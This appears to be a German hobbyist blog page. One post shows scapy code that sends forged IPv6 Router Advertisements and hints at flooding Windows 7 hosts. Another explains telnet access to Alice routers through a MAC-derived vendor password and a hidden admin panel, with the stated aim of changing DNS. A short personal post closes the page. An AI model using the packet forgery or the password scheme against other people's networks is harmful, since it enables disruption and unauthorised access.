Das Prinzip ist sehr trivial, es werden IPv6 Router Advertisements(RA) in ein Netz geschickt.
Da RA Pakete Broad bzw bei IPv6 Multicasting Pakete sind wird also jeder Rechner der dieses Paket empfängt es verarbeiten.
Da setzen wir also an.
Also rein in die Konsole und scapy gestartet.
Wir erstellen ein, jetzt folgen ein paar Definitionen an

#Layer, Protokoll sowie das der Pakettyp wird angegeben.
a = IPv6()
a.dst = "ff02::1"
#ICMPv6 Router Advertisement festlegen
b = ICMPv6ND_RA()
#Hier greift ihr euch die HwAddrese(MAC) des jeweiligen Interfaces,
#in meinem Fall eth1, sollte natürlich angepasst werden und legt sie fest.
#Der die Methode getMac ist eigentlich für ein eigenes Script gedacht
#man kann die Adresse natürlich auch per Hand definieren.
#Dazu einfach  c.lladdr = <MAC-Adresse hier einfügen>
def getMac(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927,  struct.pack('256s', ifname[:15]))
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
c = ICMPv6NDOptSrcLLAddr()
c.lladdr = getMac('eth1')
#MTU sollte 1280 betragen
d = ICMPv6NDOptMTU()
d.show()
#Den IPv6 Prefix festlegen und seine länge festlegen
e = ICMPv6NDOptPrefixInfo()
e.prefixlen = 64
e.prefix = "cc5f::"
#Und das Paket abschicken
send(a/b/c/d/e)
#Thx for the idea to http://samsclass.info

Nun wurde ein Paket gecastet. Hmm, dabei passiert bei den anderen Netzwerkteilnehmern nicht außer das sie nun ein Link zu einem Router aufbauen wollen und ihnen temporäre IPv6 Adresse zugewiesen wurde.

Vorher

Nachher

Da Windows 7 aber sehr viele Ressource für diesen Prozess verschwendet und es kein Limit gibt wieviele Router angenommen werden, wäre es möglich ein autopwn Script zu schreiben.

Das könnte dann etwa so aussehen:

Mehr …

Alice, respektive Hansenet, sperren gerne mal diverse Internetauftritte für Ihre Kunden. Allein diese Tatsache ist schon eine Frechheit, doch kommt noch hinzu das sie dann auf eine eigenen Alice 404 Seite weiterleiten auf der unzählige und schlecht durchschaubare Scripts ablaufen. Ein einfacher Ausweg ist es die DNS Server im Router zu wechseln. Es gibt in so fast jedem OS die Möglichkeit den Nameserver setzen, sollte man aber mehrere Wlan Geräte nutzen ist es wohl der einfachere Weg den Eintrag im Router zu verändern.

Nun gut, fangen wir mal an.

Wir öffnen also das CLI und verbinden uns per telnet auf unseren Alicerouter.

telnet 192.168.1.1

Der Login lautet ‘alice’

Das Passwort setzt sich aus ‘Alice<24 bit der LAN-MAC des Routers>123′ zusammen.

Wenn die MAC also ’00-25-5x-23-7A-8B’ lauten würde sehe das Passwort so aus: ‘Alice237A8B123′

Wir befinden uns jetzt in einer total abgespeckten Busybox und können den Standart DNS Server mit dem Befehl

dns -static <dns1> <dns2> setzen.

 

 

 

 

8.8.8.8 und 8.8.4.4 sind Google DNS Server. Diese leisten einen guten Dienst wie ich finde. Wer googleparanoid ist kann auch gerne die openDNS Server oder die vom CCC empfohlenen eintragen.

• 85.214.73.63 (anonymisierungsdienst.foebud.org)
• 204.152.184.76 (f.6to4-servers.net, ISC, USA)
• 2001:4f8:0:2::14 (f.6to4-servers.net, IPv6, ISC)
• 194.150.168.168 (dns.as250.net; anycast DNS!)
• 213.73.91.35 (dnscache.berlin.ccc.de)
• 80.237.196.2
• 194.95.202.198

Stand: 14.04.2011

Nun schließen wir die Session per ‘logout’, starten die Router über das Panel neu und die Katze ist im Sack.

Als kleinen Zusatztipp für all diejenigen denen das absolut beschnittene Alicepanel auf die Nerven geht:

Nutzt diesen Link: http://192.168.1.1/scprttrg.cmd?action=view und logt euch mit dem oben beschriebenen Telnetpasswort ein. Hinter diesem Link befindet sich das Originalpanel dieses Alice gebrandeten Siemensrouters. Nun könnt ihr bastel was das Zeug hält.

Und dir Hoo, viel Erfolg bei der Jobsuche!

Greetz CCiTT

Fett - mich hat eben die Sonne geweckt anstatt, wie üblich, der Wecker. Endlich wieder gutes Wetter! Ich für meinen Teil werde heut’ wohl die meiste Zeit am Ufer verbringen. Grillfleisch ist genug da, ein Kollege bringt den Grill(den großen *g), der andere was zu trinken. Nun gut, aber warum ich eigentlich schreiben - wie ihr seht steht ein neues Design. Ich hatte mich gestern mal hingesetzt und angefangen zu basteln, ich hoffe es gefällt

Ich bin natürlich, wie immer, offen für konstruktive Kritik. Auch würde ich mich über eine kleine Nachricht oder Kommentar freuen, wenn auf dem Blog irgendwo Irgendwas rumbuggt.

Mehr …